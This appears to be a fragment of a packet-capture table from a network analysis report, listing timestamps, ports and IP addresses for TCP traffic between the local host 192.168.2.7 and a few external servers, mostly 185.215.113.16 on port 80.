Aug 26, 2024 23:29:23.000199080 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.000215054 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.000282049 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.000298977 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.000308990 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.000310898 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.000319958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.000330925 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.000334024 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.000340939 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.000349045 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.000392914 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.000392914 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.034679890 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:23.034795046 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:23.035784960 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:23.042504072 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:23.047975063 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:23.066384077 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.078114986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078135014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078145981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078171968 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078190088 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078202009 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078219891 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078263044 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078263044 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078470945 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078488111 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078500032 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078511000 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078522921 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078526020 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078535080 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078541040 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078546047 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078572989 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078604937 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078604937 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078763962 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078773975 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078784943 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078797102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078809023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078820944 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078825951 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078831911 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078844070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078855038 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078872919 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078882933 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078903913 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078916073 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.078933001 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078972101 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.078993082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079005003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079015017 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079029083 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079040051 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079051971 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079062939 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079066992 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.079072952 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079082012 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.079099894 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.079113960 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079124928 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079134941 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079143047 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.079147100 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079159975 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.079163074 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.079202890 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.079202890 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.086836100 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.086913109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.086922884 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.086935043 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.086946011 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.086956978 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.086973906 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.086977005 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087018967 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087311029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087323904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087332964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087344885 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087357998 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087368965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087373018 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087384939 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087384939 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087385893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087397099 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087409019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087418079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087423086 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087425947 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087425947 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087435961 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087447882 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087449074 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087466002 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087505102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087515116 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087534904 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087575912 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087588072 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087598085 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087599993 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087610006 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087639093 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087642908 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087656975 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087667942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087668896 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087678909 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087682962 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087707043 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087717056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087733984 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087733984 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087764025 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087790966 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087796926 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087809086 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087837934 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087898016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087908030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087918043 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087929010 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.087934971 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087973118 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.087973118 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.088094950 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088107109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088119030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088124037 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088129997 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088150978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.088171959 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088182926 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088191986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088200092 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.088218927 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.088313103 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.088751078 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088802099 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.088816881 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088845968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088864088 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.088948965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088958979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088969946 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088974953 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.088980913 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.088992119 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.089010000 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.089041948 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.089041948 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090018988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090064049 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090074062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090090036 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090092897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090104103 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090115070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090120077 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090162992 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090162992 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090172052 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090236902 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090253115 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090265036 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090267897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090279102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090291023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090301991 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090305090 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090315104 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090326071 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090326071 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090337038 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.090342045 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090342045 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.090460062 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.091367960 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.091412067 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.091423035 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.091433048 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.091434956 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.091459036 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.091528893 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.091702938 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.091712952 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.091725111 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.091774940 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.091774940 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.092329979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.092339993 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.092350006 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.092360973 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.092387915 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.092432976 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.093110085 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093120098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093205929 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093211889 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.093215942 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093286991 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.093286991 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.093297005 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093307018 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093358994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.093482971 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093492031 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093540907 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.093568087 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093579054 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093605995 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.093633890 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.093697071 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.121170044 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:23.169200897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169215918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169226885 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169301987 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169326067 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169353962 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169471979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169482946 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169483900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169495106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169507980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169519901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169531107 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169536114 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169543028 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169553995 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169564962 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169572115 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169572115 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169581890 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169608116 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169614077 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169631004 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169644117 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169644117 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169655085 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169662952 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169667006 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169677019 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169678926 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169689894 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169735909 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169735909 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169900894 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169914007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169960976 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169972897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169984102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.169991970 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.169996023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.170007944 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.170011997 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.170038939 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.170119047 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.170124054 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.170135021 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.170145988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.170156956 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.170167923 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.170175076 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.170175076 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.170180082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.170192003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.170202017 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.170239925 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.170239925 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.177572012 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177583933 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177599907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177611113 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177620888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177650928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.177650928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.177680016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177683115 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.177690983 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177742004 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.177742004 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.177897930 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177907944 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177930117 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177942038 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177952051 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177958012 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.177968979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177974939 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.177980900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.177990913 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178003073 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.178003073 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.178170919 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.178679943 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178736925 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178749084 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178858042 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178869009 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178879023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178888083 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.178889036 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178914070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178920031 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.178920031 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.178926945 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178936958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178950071 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.178963900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178976059 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178987026 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.178989887 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.178989887 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.178997040 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179048061 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.179048061 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.179069042 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179084063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179095984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179107904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179112911 CEST	49734	80	192.168.2.7	185.215.113.16
